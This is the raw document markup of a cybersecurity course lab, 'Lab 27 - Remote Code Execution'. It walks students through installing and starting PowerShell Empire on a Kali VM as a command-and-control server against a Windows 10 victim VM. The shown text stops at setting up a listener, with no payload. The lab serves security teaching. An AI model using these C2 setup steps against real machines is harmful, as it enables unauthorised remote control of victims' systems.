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Cybersecurity 401 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 6 - Threat Modeling and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">__________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_57lqrtg0h7c" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 27 - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution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160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jjta34ytae5a" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="4775200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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160" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| Rodrigo Brasil</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   12/2023 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u7fkiixmi8fe" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="320" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6hug63wnt904" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 1: Staging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For today’s lab you’ll need a Windows 10 VM and a Kali Linux VM with Empire installed. Kali will be our C2 server. To install PowerShell Empire on your Kali VM, simply run the command: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install powershell-empire</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pP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5443538" cy="2703684"/>
            <wp:effectExtent b="0" l="0" r="0" t="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443538" cy="270368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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker Kali VM running</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pP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4924425" cy="1743075"/>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244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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Powershell empire is already installed on the attacker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pP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5138738" cy="3832713"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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138738" cy="38327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00" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 10 Victim VM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="320" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_955bpnc2r7w4" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="320" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1rf4bbi1qt8l" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start PowerShell Empire</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open up a terminal and start the Empire server by running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo powershell-empire server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. When the Empire server starts successfully, open up another terminal and start the Empire client by running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo powershell-empire client</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. You should now have the Empire interactive prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2771775" cy="4953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7717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00" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch the powershell-empire server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5429250" cy="1762125"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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4292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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2800350" cy="457200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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8003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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch the powershell-empire client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="42545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300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="320" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9j8vbnskq39"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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="320" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l1erlzabubgh" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 2: Setup a Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To prepare the attack, you’ll need to setup a listener in Empire. Reference the provided resources as to how to execute the procedures in this lab. Make sure the listener is running before proceeding to the next stage of the lab. Take a look at these commands, then access Empire and attempt to setup your own listener. Note that these are not sequential lab instructions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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listeners</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will say no listeners currently active and enter listeners mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="72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686175" cy="1209675"/>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6861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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No listener has been created yet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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back</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will exit listeners mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="72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133600" cy="276225"/>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1336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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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uselistener [protocol]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will add a listener for the entered protocol.</w:t>
      </w:r>
    </w:p>
